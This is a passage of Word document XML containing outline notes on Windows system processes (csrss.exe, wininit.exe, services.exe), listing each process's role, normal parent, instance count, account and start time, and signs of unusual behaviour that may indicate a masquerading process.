        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Makes Windows API available to other processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0C228E" w14:textId="6A916E5F" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>maps drive letters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68441E7B" w14:textId="2B6662AE" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>handles Windows shutdown process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E48448" w14:textId="0B01D6D1" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Normal Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609AD3F6" w14:textId="73B40376" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1"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System32\csrss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF5C565" w14:textId="17A394DA" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Parent Process: Created by an instance of smss.exe (non-existent process)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D897D11" w14:textId="28547846" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Number of Instances: two+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B96D1BF" w14:textId="1581A7CF" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User Account: Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0F6852" w14:textId="148EC8CB" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Start Time: seconds after boot time for Session 0 and 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B9D83B" w14:textId="788FF0DE" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unusual Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45187C58" w14:textId="086D2AA9" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>An actual parent process (as smss.exe calls process then self-terminates)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0A3922" w14:textId="673C8B7C" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Image File path other than C:\Windows\System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BFF5AE" w14:textId="16625413" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Subtle misspellings to hide rogue processes masquerading as csrss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5540109A" w14:textId="1B3EEC67" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User is not SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FFE543" w14:textId="73FBB3C8" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>WININIT.EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2CF2F9" w14:textId="7291BDC3" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Windows Initialization Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C29D36E" w14:textId="1FF43609" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>launches services.exe (Service Control Manager)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C9B096" w14:textId="3ADC7896" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>lsass.exe (Local Security Authority)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370ADB40" w14:textId="09F91C51" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>lsaiso.exe within Session 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BFF411" w14:textId="37EA0104" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>associated with Credential Guard and Key Guard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421A8969" w14:textId="35C74019" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>will only be seen if Credential Guard is enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0A9232" w14:textId="7B596AC8" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Normal Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306282CD" w14:textId="3C323614" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1"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System32\wininit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D517C33" w14:textId="5036E144" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Parent Process: Created by smss.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646CCDAF" w14:textId="6A1DA160" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Number of Instances: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC4E0E8" w14:textId="3BE706DA" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>User Account: Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FEB8BB" w14:textId="3B9A1F5A" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Start Time: Within seconds of boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B1859B" w14:textId="54CC1AAF" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Unusual Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352881D1" w14:textId="42C26447" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Actual parent process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368DD082" w14:textId="43200C16" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>image file path other than C:\Windows\System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7C6EA6" w14:textId="5A1BC60D" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>subtle misspellings to hide rogue processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7689CDBE" w14:textId="4257D9B6" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>multiple running instances</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F47E2C0" w14:textId="37F2D9E5" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>not running as SYSTEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9E05B9" w14:textId="3AC7A63F" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>WININIT.EXE &gt; SERVICES.EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18419DAC" w14:textId="12B77677" w:rsidR="00A944E1" w:rsidRPr="0084205E" w:rsidRDefault="00A944E1" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Service Control M</w:t>
      </w:r>
      <w:r w:rsidR="00070A90" w:rsidRPr="0084205E">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>nager</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01527250" w14:textId="45BE2500" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>handle system services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9E3A22" w14:textId="46D6ABAB" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>loading services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34849703" w14:textId="487F0251" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>interacting with services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4433C5BC" w14:textId="5923FD54" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>starting/ending services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BA76CD" w14:textId="24E5F15A" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>maintains database that can be queried using sc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2468C33E" w14:textId="14CB3F15" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>storied in registry HKLM\System\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>\Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543FB882" w14:textId="696DD5EB" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>loads device drivers marked as auto-start into memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A9A818" w14:textId="53D970C5" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">sets value of Last Known Good control set to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4EF6572E" w14:textId="7F75712E" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>HKLM\System\Select\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LastKnownGood</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5783FC67" w14:textId="0B76DD79" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>also starts other key processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1B27B9" w14:textId="40444DD0" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">svchost.exe, spoolsv.exe, msmpeng.exe, dllhost.exe, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1769F39D" w14:textId="7E079FB5" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Normal Behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0586E7AE" w14:textId="266C7B04" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90"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System32\services.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB8103C" w14:textId="5C4D9BD5" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Parent Process: wininit.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28602AFF" w14:textId="39DAB7D8" w:rsidR="00070A90" w:rsidRPr="0084205E" w:rsidRDefault="00070A90" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
